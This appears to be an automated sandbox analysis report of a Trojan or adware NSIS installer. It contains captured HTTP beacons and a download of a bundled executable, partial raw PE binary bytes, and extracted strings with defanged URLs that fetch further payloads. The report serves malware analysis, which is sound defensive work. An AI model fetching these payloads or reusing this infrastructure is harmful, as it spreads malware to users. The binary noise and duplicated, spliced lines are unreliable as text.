.H=$...ne...wQ.p.........ZKX.[.[ek.....I~.E..-.......Z.V.]3.........J..H...p..:..X];.a......~.d.....,......K...p..t...o....i..H0.9..u#...c....T7V.S...*..-.IZ......i\...!..2~rU..e.JP..._.nQ...v~....o....U........f$.-.kJ....$'....U:..g.....l#...i......{r.....[..oe7`..l....1n.R.....e.B}][w.HR2.3v.O.cw...N...............k..=..LN=H2...Fjs...LdG....T:.2"..c.e..U..r].>#..g%...f.gg.....A0.,.........KC..?^.|.h..i.f.1.......E.5 .G....f.*...OZ.`.~Z.f......&u...w.6o.e ..*xQ.I......2Ui..P7...'..C....0..vV.V3.;.gw...e[....#..1C.u......'...%...\.....|.c.VD..7..3 6u%sJ.....e....9.@r..x}.. EP.i.by.mF.;......GP..ia....;6.....CJdu...[V|Ll..8....x.h/.F}%0.....'.P....]..gg.....6....U....?....R'/.fv.hF........tk....y D.cD....%. .P^...Px._..,..w.-DL!05.}/h.6zk.l....r..y......;Y...D.o.R..
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: XYmvvBMCiNJ6rVedDRFa69v1YANR9WCzHw5G5n2NBxqlGP1xatdKyybRRSGyfr8r
x-amz-request-id: 95DE9A77C9061F96
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CBHR1bE/VuPzv0/HQy0QdE i8i 74KftUfvClZSjkbI1EL9uRF7bDWL5goojla2W
x-amz-request-id: D4AE7D0D8D1340BC
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 6Ar7bqkcLfdJEwnpk9fPljon12qr5JH8MwaxEKUzOIwmNLqeC3mqFjSjusc6895U
x-amz-request-id: 76325E2C0BC11F3D
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 6Ar7bqkcLfdJEwnpk9fPljon12qr5JH8MwaxEKUzOIwmNLqeC3mqFjSjusc6895U..x-amz-request-id: 76325E2C0BC11F3D..Date: Fri, 06 Nov 2015 06:58:32 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CxcApR4//c/YoYSaNd4eN645XwOYOLNvPAxi3Hk8FLjWG vXPaKzfOdWLGWtYmU3
x-amz-request-id: 5067FF44500FEEA2
Date: Fri, 06 Nov 2015 06:58:39 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: CxcApR4//c/YoYSaNd4eN645XwOYOLNvPAxi3Hk8FLjWG vXPaKzfOdWLGWtYmU3..x-amz-request-id: 5067FF44500FEEA2..Date: Fri, 06 Nov 2015 06:58:39 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: SaSlj6NdJMTqA/nS q sk6uH8HjSfUffsNTji4xuXi2Ew5lTpTX60/El2s8ce6r9
x-amz-request-id: 7DEA6CCA0132797E
Date: Fri, 06 Nov 2015 06:58:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: SaSlj6NdJMTqA/nS q sk6uH8HjSfUffsNTji4xuXi2Ew5lTpTX60/El2s8ce6r9..x-amz-request-id: 7DEA6CCA0132797E..Date: Fri, 06 Nov 2015 06:58:41 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: JfKIaeh7u0R1zYfjG3x1lrVgK4hRq8tnpAN4jeP8u8yQqBj/JHfN9MjM/RWWoU 7
x-amz-request-id: 5D883FD5BB76976D
Date: Fri, 06 Nov 2015 06:58:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: JfKIaeh7u0R1zYfjG3x1lrVgK4hRq8tnpAN4jeP8u8yQqBj/JHfN9MjM/RWWoU 7..x-amz-request-id: 5D883FD5BB76976D..Date: Fri, 06 Nov 2015 06:58:52 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: izyiwRW1lR sBzppH1X4ARN2PY/AgDqWc8fyYdQzpKacU7/okJcni4xcvop8YhXF
x-amz-req
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=894
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1446793125.dop016.fr7.t,1446793124.cds042.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d..K.................d..........^5............@..........................P.......................................................@..8............................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....p...........|..............@....ndata... ... ...........................rsrc...8....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......C..H.P.u..u..u...T.@..B...SV.5..C..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h..C.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tvVHBcgmNTq4nDfn2Zxw1KjIhFoQXZvRhOB89yEJyhPP5HOAa2ZbrcnOzUwAUzV1IUeIW6NIBBk=
x-amz-request-id: A6C6A15EFB4488E1
Date: Fri, 06 Nov 2015 06:58:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tvVHBcgmNTq4nDfn2Zxw1KjIhFoQXZvRhOB89yEJyhPP5HOAa2ZbrcnOzUwAUzV1IUeIW6NIBBk=..x-amz-request-id: A6C6A15EFB4488E1..Date: Fri, 06 Nov 2015 06:58:31 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_468:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
60TotalSecurity.exe
60TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
b7e6ba0a6e0e.exe&errorlevel=0
b7e6ba0a6e0e.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
kDC.oQ
kDC.oQ
w.spR5
w.spR5
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2B.tmp
nsf2B.tmp
nsf2B.tmp
//livestatscounter.com/Generic/vos.php?ch=
//livestatscounter.com/Generic/vos.php?ch=
92c9655f14abb39377f27c1a0aa364.exe
92c9655f14abb39377f27c1a0aa364.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
e0e.exe&errorlevel=0&v=2\"}"}
e0e.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
e6ba0a6e0e.exe
e6ba0a6e0e.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa6.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
222222222222
222222222222
1.0.0.1
1.0.0.1
nsz2A.tmp_784:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
%Program Files%
%Program Files%
\System.dll
\System.dll
\nsExec.dll
\nsExec.dll
\inetc.dll
\inetc.dll
$$\wininit.ini
$$\wininit.ini
q.oXz
q.oXz
1GRqL9)%sX
1GRqL9)%sX
YB%U}^
YB%U}^
g.ZO||k[
g.ZO||k[
^2S%S
^2S%S
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsz2A.tmp
nsz2A.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa2C.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa2C.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
Nullsoft Install System v2.46
Nullsoft Install System v2.46